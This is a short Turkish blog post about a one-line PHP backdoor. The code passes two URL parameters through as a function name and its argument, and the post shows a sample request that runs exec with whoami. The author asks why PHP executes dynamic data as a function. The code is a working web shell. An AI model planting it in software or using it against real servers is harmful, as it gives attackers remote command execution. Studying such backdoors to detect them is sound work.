Tankado.com

İlginç bir PHP arka kapısı

Birkaç yıl önce Genius‘un sayesinde haberdar olduğum aşağıdaki kod hala daha (v7.2.x) çalışmakta. İlginç yanı short_tags etkin olmasa dahi çalışıyor. Daha ilginci ve hakkkında pek bilgi bulamadığım kısmı ise dinamik olarak yaratılan ve veri (data) olarak ele alınması gereken bir yapının PHP tarafından bir metod (function) olarak değerlendirilmesi ve çalıştırılması.

PHP kodu:

<?=$_GET['z']($_GET['x']);

URL isteği:

http://localhost/dev/backdoor.php?z=exec&x=whoami

Sonuç:

short_open_tags kullanımı betik dillerde yaygın bir durum. Aşağıdaki görselden kullanımı görebilirsiniz.

Lakin dinamik olarak sunulan bir verinin PHP tarafından icra ediliyor olması gerçekten ilginç bir durum. Dökümantasyonda bu durum ile ilgili bir bilgi bulamadım. Bir bug’dan ziyade feature olduğunu düşünmek istiyorum. Bu konuda bilgisi olanlar aşağıya yorum yazarsa mutlu olurum.

Exit mobile version